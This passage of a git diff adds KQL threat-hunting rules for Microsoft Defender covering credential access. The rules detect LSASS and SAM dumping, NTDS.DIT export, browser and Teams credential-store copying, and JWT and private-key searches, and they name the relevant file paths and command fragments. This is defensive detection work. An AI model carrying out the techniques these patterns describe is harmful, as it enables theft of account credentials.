--- /dev/null +++ b/KQL/rules/Credential Access/ntds_dit_created.kql @@ -0,0 +1,10 @@ +// Title: NTDS.DIT Created +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-05 +// Level: low +// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 + +DeviceFileEvents +| where FolderPath endswith "ntds.dit" \ No newline at end of file diff --git a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql new file mode 100644 index 00000000..eba0d7ab --- /dev/null +++ b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql @@ -0,0 +1,10 @@ +// Title: NTDS.DIT Creation By Uncommon Parent Process +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-11 +// Level: high +// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 + +DeviceFileEvents +| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessParentFileName in~ ("cscript.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "powershell.exe", "pwsh.exe", "w3wp.exe", "wscript.exe")) or (InitiatingProcessParentFileName startswith "apache" or InitiatingProcessParentFileName startswith "tomcat" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql new file mode 100644 index 00000000..a344ac8b --- /dev/null +++ b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql @@ -0,0 +1,10 @@ +// Title: NTDS.DIT Creation By Uncommon Process +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-11 +// Level: high +// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003 + +DeviceFileEvents +| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") or (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql b/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql new file mode 100644 index 00000000..ff5cdac2 --- /dev/null +++ b/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql @@ -0,0 +1,10 @@ +// Title: NTDS Exfiltration Filename Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-11 +// Level: high +// Description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 + +DeviceFileEvents +| where FolderPath endswith "\\All.cab" or FolderPath endswith ".ntds.cleartext" \ No newline at end of file diff --git a/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql b/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql new file mode 100644 index 00000000..0b259a6a --- /dev/null +++ b/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql @@ -0,0 +1,12 @@ +// Title: Permission Misconfiguration Reconnaissance Via Findstr.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-12 +// Level: medium +// Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. +This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.006 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "\"Everyone\"" or ProcessCommandLine contains "'Everyone'" or ProcessCommandLine contains "\"BUILTIN\\\"" or ProcessCommandLine contains "'BUILTIN\\'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains "icacls " and ProcessCommandLine contains "findstr " and ProcessCommandLine contains "Everyone") \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_browser_data_stealing.kql b/KQL/rules/Credential Access/potential_browser_data_stealing.kql new file mode 100644 index 00000000..1303b99a --- /dev/null +++ b/KQL/rules/Credential Access/potential_browser_data_stealing.kql @@ -0,0 +1,13 @@ +// Title: Potential Browser Data Stealing +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-23 +// Level: medium +// Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser. +Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. +Web browsers typically store the credentials in an encrypted format within a credential store. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.003 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") or (FolderPath endswith "\\esentutl.exe" or FolderPath endswith "\\xcopy.exe" or FolderPath endswith "\\robocopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("esentutl.exe", "XCOPY.EXE", "robocopy.exe"))) and (ProcessCommandLine contains "\\Amigo\\User Data" or ProcessCommandLine contains "\\BraveSoftware\\Brave-Browser\\User Data" or ProcessCommandLine contains "\\CentBrowser\\User Data" or ProcessCommandLine contains "\\Chromium\\User Data" or ProcessCommandLine contains "\\CocCoc\\Browser\\User Data" or ProcessCommandLine contains "\\Comodo\\Dragon\\User Data" or ProcessCommandLine contains "\\Elements Browser\\User Data" or ProcessCommandLine contains "\\Epic Privacy Browser\\User Data" or ProcessCommandLine contains "\\Google\\Chrome Beta\\User Data" or ProcessCommandLine contains "\\Google\\Chrome SxS\\User Data" or ProcessCommandLine contains "\\Google\\Chrome\\User Data\\" or ProcessCommandLine contains "\\Kometa\\User Data" or ProcessCommandLine contains "\\Maxthon5\\Users" or ProcessCommandLine contains "\\Microsoft\\Edge\\User Data" or ProcessCommandLine contains "\\Mozilla\\Firefox\\Profiles" or ProcessCommandLine contains "\\Nichrome\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera GX Stable\\" or ProcessCommandLine contains "\\Opera Software\\Opera Neon\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera Stable\\" or ProcessCommandLine contains "\\Orbitum\\User Data" or ProcessCommandLine contains "\\QIP Surf\\User Data" or ProcessCommandLine contains "\\Sputnik\\User Data" or ProcessCommandLine contains "\\Torch\\User Data" or ProcessCommandLine contains "\\uCozMedia\\Uran\\User Data" or ProcessCommandLine contains "\\Vivaldi\\User Data") \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql new file mode 100644 index 00000000..6cee6571 --- /dev/null +++ b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql @@ -0,0 +1,12 @@ +// Title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-23 +// Level: high +// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 +// False Positives: +// - Other legitimate network providers used and not filtred in this rule + +DeviceProcessEvents +| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Services\\" and ProcessCommandLine contains "\\NetworkProvider" \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql new file mode 100644 index 00000000..cc0b9dd7 --- /dev/null +++ b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql @@ -0,0 +1,12 @@ +// Title: Potential Credential Dumping Attempt Using New NetworkProvider - REG +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-23 +// Level: medium +// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 +// False Positives: +// - Other legitimate network providers used and not filtred in this rule + +DeviceRegistryEvents +| where (RegistryKey endswith "\\System\\CurrentControlSet\\Services*" and RegistryKey contains "\\NetworkProvider") and (not(((RegistryKey contains "\\System\\CurrentControlSet\\Services\\WebClient\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql new file mode 100644 index 00000000..3162f7cb --- /dev/null +++ b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql @@ -0,0 +1,10 @@ +// Title: Potential Credential Dumping Via LSASS Process Clone +// Author: Florian Roth (Nextron Systems), Samir Bousseaden +// Date: 2021-11-27 +// Level: critical +// Description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003, attack.t1003.001 + +DeviceProcessEvents +| where FolderPath endswith "\\Windows\\System32\\lsass.exe" and InitiatingProcessFolderPath endswith "\\Windows\\System32\\lsass.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql new file mode 100644 index 00000000..f49027a9 --- /dev/null +++ b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql @@ -0,0 +1,12 @@ +// Title: Potential Credential Dumping Via LSASS SilentProcessExit Technique +// Author: Florian Roth (Nextron Systems) +// Date: 2021-02-26 +// Level: critical +// Description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey contains "Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql b/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql new file mode 100644 index 00000000..4c0c29b3 --- /dev/null +++ b/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql @@ -0,0 +1,12 @@ +// Title: Potential Credential Dumping Via WER +// Author: @pbssubhash , Nasreddine Bencherchali +// Date: 2022-12-08 +// Level: high +// Description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine. + +DeviceProcessEvents +| where (((ProcessCommandLine contains " -u -p " and ProcessCommandLine contains " -ip " and ProcessCommandLine contains " -s ") and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and (FolderPath endswith "\\Werfault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql b/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql new file mode 100644 index 00000000..f652df5b --- /dev/null +++ b/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql @@ -0,0 +1,15 @@ +// Title: Potential Network Sniffing Activity Using Network Tools +// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-21 +// Level: medium +// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump". +Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. +An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.discovery, attack.t1040 +// False Positives: +// - Legitimate administration activity to troubleshoot network issues + +DeviceProcessEvents +| where (ProcessCommandLine contains "-i" and FolderPath endswith "\\tshark.exe") or FolderPath endswith "\\windump.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql b/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql new file mode 100644 index 00000000..4f3ce6af --- /dev/null +++ b/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql @@ -0,0 +1,14 @@ +// Title: Potential PowerShell Console History Access Attempt via History File +// Author: Luc Génaux +// Date: 2025-04-03 +// Level: medium +// Description: Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt). +This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001 +// False Positives: +// - Legitimate access of the console history file is possible + +DeviceProcessEvents +| where ProcessCommandLine contains "ConsoleHost_history.txt" or ProcessCommandLine contains "(Get-PSReadLineOption).HistorySavePath" \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql b/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql new file mode 100644 index 00000000..ed96ee5e --- /dev/null +++ b/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE +// Author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-01-16 +// Level: high +// Description: Detects usage of cmdkey to look for cached credentials on the system +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.005 +// False Positives: +// - Legitimate administrative tasks + +DeviceProcessEvents +| where (ProcessCommandLine contains " -l" or ProcessCommandLine contains " /l" or ProcessCommandLine contains " –l" or ProcessCommandLine contains " —l" or ProcessCommandLine contains " ―l") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_sam_database_dump.kql b/KQL/rules/Credential Access/potential_sam_database_dump.kql new file mode 100644 index 00000000..1a870e9b --- /dev/null +++ b/KQL/rules/Credential Access/potential_sam_database_dump.kql @@ -0,0 +1,12 @@ +// Title: Potential SAM Database Dump +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-11 +// Level: high +// Description: Detects the creation of files that look like exports of the local SAM (Security Account Manager) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 +// False Positives: +// - Rare cases of administrative activity + +DeviceFileEvents +| where (FolderPath endswith "\\Temp\\sam" or FolderPath endswith "\\sam.sav" or FolderPath endswith "\\Intel\\sam" or FolderPath endswith "\\sam.hive" or FolderPath endswith "\\Perflogs\\sam" or FolderPath endswith "\\ProgramData\\sam" or FolderPath endswith "\\Users\\Public\\sam" or FolderPath endswith "\\AppData\\Local\\sam" or FolderPath endswith "\\AppData\\Roaming\\sam" or FolderPath endswith "_ShadowSteal.zip" or FolderPath endswith "\\Documents\\SAM.export" or FolderPath endswith ":\\sam") or (FolderPath contains "\\hive_sam_" or FolderPath contains "\\sam.save" or FolderPath contains "\\sam.export" or FolderPath contains "\\~reg_sam.save" or FolderPath contains "\\sam_backup" or FolderPath contains "\\sam.bck" or FolderPath contains "\\sam.backup") \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql b/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql new file mode 100644 index 00000000..677efffa --- /dev/null +++ b/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential SPN Enumeration Via Setspn.EXE +// Author: Markus Neis, keepwatch +// Date: 2018-11-14 +// Level: medium +// Description: Detects service principal name (SPN) enumeration used for Kerberoasting +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1558.003 +// False Positives: +// - Administration activity + +DeviceProcessEvents +| where (ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q ") and (FolderPath endswith "\\setspn.exe" or ProcessVersionInfoOriginalFileName =~ "setspn.exe" or (ProcessVersionInfoFileDescription contains "Query or reset the computer" and ProcessVersionInfoFileDescription contains "SPN attribute")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql b/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql new file mode 100644 index 00000000..af3aa6ba --- /dev/null +++ b/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql @@ -0,0 +1,12 @@ +// Title: Potential Windows Defender AV Bypass Via Dump64.EXE Rename +// Author: Austin Songer @austinsonger, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-11-26 +// Level: high +// Description: Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder. +Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 + +DeviceProcessEvents +| where (FolderPath contains "\\Microsoft Visual Studio\\" and FolderPath endswith "\\dump64.exe" and FolderPath startswith ":\\Program Files") and (ProcessVersionInfoOriginalFileName =~ "procdump" or (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " -mp ")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql b/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql new file mode 100644 index 00000000..f2753d96 --- /dev/null +++ b/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Command Targeting Teams Sensitive Files +// Author: @SerkinValery +// Date: 2022-09-16 +// Level: medium +// Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. +The database might contain authentication tokens and other sensitive information about the logged in accounts. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1528 + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\Microsoft\\Teams\\Cookies" or ProcessCommandLine contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(FolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql b/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql new file mode 100644 index 00000000..3bec20e7 --- /dev/null +++ b/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql @@ -0,0 +1,14 @@ +// Title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2022-09-09 +// Level: medium +// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. +This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.discovery, attack.t1552 +// False Positives: +// - Legitimate usage of the utility by administrators to query the event log + +DeviceProcessEvents +| where (((ProcessCommandLine contains "-InstanceId 462") or (ProcessCommandLine contains ".eventid -eq 462") or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "System[EventID=462" and ProcessCommandLine contains "]") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains ".eventid -eq 4778" or ProcessCommandLine contains "System[EventID=4778]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains ".eventid -eq 25" or ProcessCommandLine contains "System[EventID=25]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25")) or (ProcessCommandLine contains "Microsoft-Windows-PowerShell" or ProcessCommandLine contains "Microsoft-Windows-Security-Auditing" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-RemoteConnectionManager" or ProcessCommandLine contains "Microsoft-Windows-Windows Defender" or ProcessCommandLine contains "PowerShellCore" or ProcessCommandLine contains "Security" or ProcessCommandLine contains "Windows PowerShell")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog ")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql b/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql new file mode 100644 index 00000000..1d8585e5 --- /dev/null +++ b/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql @@ -0,0 +1,13 @@ +// Title: Potentially Suspicious JWT Token Search Via CLI +// Author: Nasreddine Bencherchali (Nextron Systems), kagebunsher +// Date: 2022-10-25 +// Level: medium +// Description: Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". +JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others. +Threat actors may search for these tokens to steal them for lateral movement or privilege escalation. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1528, attack.t1552.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "eyJ0eXAiOi" or ProcessCommandLine contains "eyJhbGciOi" or ProcessCommandLine contains " eyJ0eX" or ProcessCommandLine contains " \"eyJ0eX\"" or ProcessCommandLine contains " 'eyJ0eX'" or ProcessCommandLine contains " eyJhbG" or ProcessCommandLine contains " \"eyJhbG\"" or ProcessCommandLine contains " 'eyJhbG'") and (ProcessCommandLine contains "find " or ProcessCommandLine contains "find.exe" or ProcessCommandLine contains "findstr" or ProcessCommandLine contains "select-string " or ProcessCommandLine contains "strings") \ No newline at end of file diff --git a/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql b/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql new file mode 100644 index 00000000..aebafd8b --- /dev/null +++ b/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious ODBC Driver Registered +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-23 +// Level: high +// Description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.persistence, attack.t1003 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (RegistryValueData contains ":\\PerfLogs\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Registration\\CRMLog" or RegistryValueData contains ":\\Windows\\System32\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\System32\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\drivers\\color\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\PRINTERS\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\SERVERS\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks_Migrated\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\Tasks\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains ":\\Windows\\Tracing\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\") and RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*" and (RegistryKey endswith "\\Driver" or RegistryKey endswith "\\Setup") \ No newline at end of file diff --git a/KQL/rules/Credential Access/powershell_get_process_lsass.kql b/KQL/rules/Credential Access/powershell_get_process_lsass.kql new file mode 100644 index 00000000..75596c70 --- /dev/null +++ b/KQL/rules/Credential Access/powershell_get_process_lsass.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Get-Process LSASS +// Author: Florian Roth (Nextron Systems) +// Date: 2021-04-23 +// Level: high +// Description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.004 + +DeviceProcessEvents +| where ProcessCommandLine contains "Get-Process lsas" or ProcessCommandLine contains "ps lsas" or ProcessCommandLine contains "gps lsas" \ No newline at end of file diff --git a/KQL/rules/Credential Access/powershell_sam_copy.kql b/KQL/rules/Credential Access/powershell_sam_copy.kql new file mode 100644 index 00000000..5400fcef --- /dev/null +++ b/KQL/rules/Credential Access/powershell_sam_copy.kql @@ -0,0 +1,13 @@ +// Title: PowerShell SAM Copy +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-29 +// Level: high +// Description: Detects suspicious PowerShell scripts accessing SAM hives +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 +// False Positives: +// - Some rare backup scenarios +// - PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\HarddiskVolumeShadowCopy" and ProcessCommandLine contains "System32\\config\\sam") and (ProcessCommandLine contains "Copy-Item" or ProcessCommandLine contains "cp $_." or ProcessCommandLine contains "cpi $_." or ProcessCommandLine contains "copy $_." or ProcessCommandLine contains ".File]::Copy(") \ No newline at end of file diff --git a/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql b/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql new file mode 100644 index 00000000..f8744d66 --- /dev/null +++ b/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql @@ -0,0 +1,10 @@ +// Title: Private Keys Reconnaissance Via CommandLine Tools +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-07-20 +// Level: medium +// Description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains ".key" or ProcessCommandLine contains ".pgp" or ProcessCommandLine contains ".gpg" or ProcessCommandLine contains ".ppk" or ProcessCommandLine contains ".p12" or ProcessCommandLine contains ".pem" or ProcessCommandLine contains ".pfx" or ProcessCommandLine contains ".cer" or ProcessCommandLine contains ".p7b" or ProcessCommandLine contains ".asc") and ((ProcessCommandLine contains "dir " and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or (ProcessCommandLine contains "Get-ChildItem " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) or (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE")) \ No newline at end of file diff --git a/KQL/rules/Credential 